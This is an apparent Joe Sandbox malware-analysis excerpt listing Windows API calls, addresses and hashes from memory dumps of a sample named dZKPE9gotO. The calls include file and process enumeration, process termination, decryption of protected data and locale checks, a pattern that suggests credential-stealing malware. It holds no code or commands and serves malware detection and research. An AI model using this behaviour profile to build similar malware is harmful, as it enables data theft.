                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F165B8A002185ACB06FF62C8D59FE7B769F45749F00442EF412572D2DF289F89CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 009C98BC
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC), ref: 009C99A2
                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 009C9A22
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9A48
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9A81
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00644BCD), ref: 009C9A89
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9A97
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C7C8E
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 009C7CE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,009B1A24,?), ref: 009C7CEC
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindNextFileA.KERNEL32(00000000,?), ref: 009C9CB6
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindClose.KERNEL32(00000000), ref: 009C9CC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$File$CloseCreateFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3744366743-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C5524
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 009C552E
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C553A
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 009C5554
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C5568
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5577
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C557E
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C558B
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C5596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009C930E
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 009C95A7
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 009C95B8
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C95D0
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C95DD
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C95E9
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C9603
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 009C936A
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: memset.MSVCRT ref: 009C8F9C
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: memset.MSVCRT ref: 009C8FAD
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: lstrcat.KERNEL32(?), ref: 009C8FEB
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: lstrcat.KERNEL32(?,?), ref: 009C8FF9
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: lstrcat.KERNEL32(?), ref: 009C9006
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$Filelstrlenmemset$CloseFirstHeapNextProcesslstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 365803619-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 009C89A7
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8A6B
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C8A78
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8A86
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8A93
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8ACD
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C7C8E
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 009C7CE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,009B1A24,?), ref: 009C7CEC
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 009C8BB6
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C8BC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$Filelstrcpy$CloseCreateFirstNextObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 888904454-0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0000$0000$0000$0000$3qB$IrB$ItB$RzB
                                                                                                                                                                                                                                                  • API String ID: 0-4004772278
                                                                                                                                                                                                                                                  • Opcode ID: 1e84449b940aa7246dd064ff38d4c4a538903fec837c583de1718d436a8a299e
                                                                                                                                                                                                                                                  • Instruction ID: e58864e2b92d10baf817651462a2313014e0b4de3663106a1d3da201be489694
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e84449b940aa7246dd064ff38d4c4a538903fec837c583de1718d436a8a299e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98825CA09087E49DE712CF28AD093927FB3AB17328F04725DC4854A3B2D7B95789C7D9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CC21F
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 009CC245
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 009CC44A
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CC46D
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009CC47D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$ExecuteExitFileModuleNameProcessShelllstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3423973079-0
                                                                                                                                                                                                                                                  • Opcode ID: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
                                                                                                                                                                                                                                                  • Instruction ID: f72edf190fa29a9758a86bbd00748bdc374802e326a919585203588330e01687
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A610860F047805BE7159F349892B7E7BA69FDB304F04D62DF4DA87282CB785A85C392
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042EEFC), ref: 009C415D
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 009C416F
                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 009C4179
                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009C41A2
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000200,?,?,?), ref: 009C4245
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3090951853-0
                                                                                                                                                                                                                                                  • Opcode ID: 544f6d7a26ade535f44ad9235432a807762fd0ca6bd9a68562a0e95ac78c3c38
                                                                                                                                                                                                                                                  • Instruction ID: 0ae5fb245ac0259bb75fd4abfecd00e08b5b1c4ecdd0f994e72933c711365766
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 544f6d7a26ade535f44ad9235432a807762fd0ca6bd9a68562a0e95ac78c3c38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D218235B04254AFD320AB60AC9AF6B7BADEBC5704F00941DBA9A47182CE795D18C762
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,009B7653,?,?,?,?,?), ref: 009C4E0D
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,009B7653,?,?,?,?,?), ref: 009C4E20
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,009B7653,?,?,?,?,?), ref: 009C4E41
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009B7653,?,?,?,?,?), ref: 009C4E5B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,009B7653,?,?,?,?,?), ref: 009C4E69
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BinaryCryptHeapProcessString$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1339486156-0
                                                                                                                                                                                                                                                  • Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction ID: f6a8ffdcf4002551438dbcf33ef178de419b3d854c929cf720d5646cb3ab4a16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00115B76604205AFE7209FA5AC98F17BBADFB9A794F56042CF99093220CB71DC148B61
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C547E
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000), ref: 009C5488
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000), ref: 009C549F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 009C54AB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C54BC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                  • Opcode ID: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
                                                                                                                                                                                                                                                  • Instruction ID: dbb91dac83da069745599fa7a128fc0142784624bc5946ce06849a601b42160b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF09031601A056BE3205B21ED4EFAB7BACDF86756F010428F905D6190EA38A995C762
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00644A23,?,?,?,?,?,?,00644A98,?,?,00644A23,?,?,?), ref: 009C40C9
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 009C40DE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapInformationProcessTimeZone
                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                  • API String ID: 3869334356-671953474
                                                                                                                                                                                                                                                  • Opcode ID: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
                                                                                                                                                                                                                                                  • Instruction ID: f311c3c185aff5f1332f93aa5ffb917ef86f2a227537daf0db163c285c7ce311
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0AF79F042505BD714977CBC0BB863A6B6BEB715F096228E280CB2E4DE705C5487CA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041FCD9
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041FCE5
                                                                                                                                                                                                                                                    • Part of subcall function 0041F6ED: FileTimeToSystemTime.KERNEL32(?,?,?,0041FC19,?,?,?), ref: 0041F710
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041FD17
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 568878067-0
                                                                                                                                                                                                                                                  • Opcode ID: 407ca429f357083cf04c9c4c4872bb59689e7af532d69774cff42304fa8d9c9a
                                                                                                                                                                                                                                                  • Instruction ID: aaec17f7b947dffab737b8477b3de4f818deabd743cf75c3ee02614451b0506f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407ca429f357083cf04c9c4c4872bb59689e7af532d69774cff42304fa8d9c9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82178B2900B04AFD325DF3AD841BA7BBE4FF88340F008A2EF59A86611E734A445CB54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 009BB2A2
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 009BB2BE
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009BB2DA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                  • Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction ID: 15f6dc5048d47219fb14a6744e974a135d179cd36fe1279d5f94c6062ea52bb7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF015A755083029FD301EF68C985A5AFBE9FFD8354F008A1AF88893350E770D994CBA2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction ID: d5ccccb239d267dee77c9fd3047dc5bff684dd2e02043b2d7da714a558b8c7e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7318AB6900609CFDB10CF99C984AEEBBF9FF88324F24404AD841A7351D771EA45CBA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                                                  • Opcode ID: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
                                                                                                                                                                                                                                                  • Instruction ID: d39c18dc740b8a088fa98ab06db579028e54285b4c58fb63b3e160e9076f712b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05E06D289042909AD3118724FD47BC67B62AB9BB01F042248E740172E0DF785D69C39B
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                                                                                                                                  • Opcode ID: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction ID: 73c1bc0e1a2c2ea9f4fe637967f95df9bf94e01366c0a8a035d29b0c4e1660b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E0DF323013108BC6208B49ECC0E47B7AEEFC477871A0132E90097312C271AC50C664
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction ID: c28e032de6ce5a98ce404d14814fafdb89eb4e70d7cdf3da8bbe6a417b93b1fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77918274E1974648E3276B2DE1167F362415FF2388F02E35FED813A6BAD7AA44C5820D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction ID: 571c8e8205d013c7e01174c47378f0145c8845013f4ed07cc4c5824a0ba80a40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F691CB24D1A74608E3275B2DE116BB262455FF2388F03E36FED413F5BAD7BA44C5820A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction ID: 0cf5ed27162275aac1acb3df7baf5e9cf54b0cddf3c05bd954f48d14aa205cc7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD31B032301B50EBCE219B09DBE5F91B77AAF84B747FE0152E8025B217D3A5AC41CA64
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
